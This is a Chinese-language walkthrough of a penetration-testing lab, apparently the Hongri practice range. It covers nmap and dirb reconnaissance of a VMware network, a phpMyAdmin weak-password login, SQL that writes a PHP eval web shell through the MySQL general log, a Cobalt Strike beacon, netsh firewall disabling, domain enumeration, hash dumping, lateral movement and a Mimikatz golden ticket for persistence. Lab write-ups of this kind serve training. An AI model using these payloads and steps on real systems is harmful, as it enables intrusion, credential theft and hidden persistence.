第一步,信息收集
1扫描网段,端口
法1:1.搜索主机,使用netdiscover
netdiscover -i eth0 -r 192.168.0.0/24
通过php探针发现192.168.29.131存在
在底端发现3306端口服务
(注意:kali中netdiscover的使用需要root身份。
切换root身份:su root
设置详见【kali】如何进入root用户_kali root-CSDN博客)
2.nmap扫描端口
nmap -v 192.168.29.131
┌──(root㉿localhost)-[/home/kali]
└─# nmap -v 192.168.29.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 17:51 CST
Initiating ARP Ping Scan at 17:51
Scanning 192.168.29.131 [1 port]
Completed ARP Ping Scan at 17:51, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:51
Completed Parallel DNS resolution of 1 host. at 17:51, 2.06s elapsed
Initiating SYN Stealth Scan at 17:51
Scanning 192.168.29.131 [1000 ports]
Discovered open port 80/tcp on 192.168.29.131
Discovered open port 1025/tcp on 192.168.29.131
Discovered open port 445/tcp on 192.168.29.131
Discovered open port 3306/tcp on 192.168.29.131
Discovered open port 1029/tcp on 192.168.29.131
Discovered open port 135/tcp on 192.168.29.131
Discovered open port 139/tcp on 192.168.29.131
Discovered open port 1027/tcp on 192.168.29.131
Discovered open port 1030/tcp on 192.168.29.131
Discovered open port 1026/tcp on 192.168.29.131
Discovered open port 1028/tcp on 192.168.29.131
Completed SYN Stealth Scan at 17:51, 1.59s elapsed (1000 total ports)
Nmap scan report for 192.168.29.131
Host is up (0.0014s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
3306/tcp open mysql
MAC Address: 00:0C:29:BF:5A:70 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.02 seconds
Raw packets sent: 1010 (44.424KB) | Rcvd: 1001 (40.072KB)
发现开放端口80(http) 3306(mysql)
法2:直接使用nmap检测29网段,开放端口
nmap -PO 192.168.29.0/24
Nmap scan report for 192.168.29.2
Host is up (0.00041s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:E6:28:AA (VMware)
Nmap scan report for 192.168.29.131
Host is up (0.0012s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
3306/tcp open mysql
MAC Address: 00:0C:29:BF:5A:70 (VMware)
Nmap scan report for 192.168.29.254
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.29.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:EF:87:0E (VMware)
Nmap scan report for 192.168.29.130
Host is up (0.0000080s latency).
All 1000 scanned ports on 192.168.29.130 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 110.89 seconds
2目录扫描(dirb)
dirb使用
-a 设置user-agent
-p <proxy[:port]>设置代理
-c 设置cookie
-z 添加毫秒延迟,避免洪水攻击
-o 输出结果
-X 在每个字典的后面添加一个后缀
-H 添加请求头
-i 不区分大小写搜索
dirb http://192.168.29.131/
得到子目录:http://192.168.29.131/phpMyAdmin/
这里发现弱口令漏洞(root:root)
3.这里登陆后,通过sql语句注入shell语句,用蚁剑连接,
sql语句注入shell语句过程:
SHOW VARIABLES LIKE '%general%' //查看日志信息
SET GLOBAL general_log='on'; //开启日志
set global general_log_file = 'C:/phpStudy/WWW/hack.php' //设置日志路径
SELECT '<?php @eval($_POST["cmd"]);?>' //写入shell
这里注意:url地址是写入shell的目录!!
否则连接失败
右键操作:终端,文件浏览......
这一步完成之后,即获取了权限,接下来需要进一步上线控制,采用普遍的内网渗透工具cs或msf(方便操作)来在内网提权,横向.......
4.cs监听
通过蚁剑,完成cs监听
cs(cobalt strike)是一个可以团队合作的渗透平台,分为客户端(可在win和Linux)和服务端(只能在Linux搭建),下图目录
其中cobaltstrike.exe是客户端开启文件,teamserver是服务端开启文件。所以cs文件需要在两台计算机上都存在。
使用时,要先开启服务端(kali机上)
1. 打开cs的目录
2. 切换root
3. ./teamserver ip地址 连接密码
如下图,cs服务端已成功开启
然后在本机上打开客户端
直接点击cobaltstrike.exe
服务端ip,端口,名字(随意),连接密码
cs使用:
1.建立监听
使用参考: (命令汉译,简单使用.....)
Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4_cobaltstrike安装教程-CSDN博客
值得一提的是,cs监听到目标机器有两种方法
1.上传exe文件
2. 上传web攻击
cs监听成功后,上方出现目标机
关闭防火墙
shell netsh advfirewall set allprofiles state off
内网信息收集
cs使用前加shell
ipconfig #查看网络
net view # 查看局域网内其他主机名
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net view /domain # 查看有几个域
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器主机名(可能有多台)
值得一提的是,我分别在蚁剑和cs里收集信息,发现在cs中关于域的信息得到的更多。
net view 得到三台主机名
渗透:
1.提权Access->Elevate
从 Adminstrator*变成system*
2.抓hash,抓明文密码
3.端口扫描(52段)
开放445端口,为了进入内网(52网段),创建SMB监听隧道
通过隧道检查内网(52网段) 得到其他台主机IP,操作如下,结果黑框
这样得到其他攻击对象(主机)
横向移动
贴一张别人的图片(不想弄了)
横向成功!(这里由于我是分两次完成的笔记,所以IP地址有小小的变化,kali:192.168.29.129...)
最后,完成黄金票据(相当于留后门)
通过抓取Mimikatz,hash,记录SID,Domain,hash得到黄金票据
最后清理痕迹,(cs的利用到此为止)
再补充msf,,,,再写一篇补充红日靶场吧,不太全,太多了。
参考文章: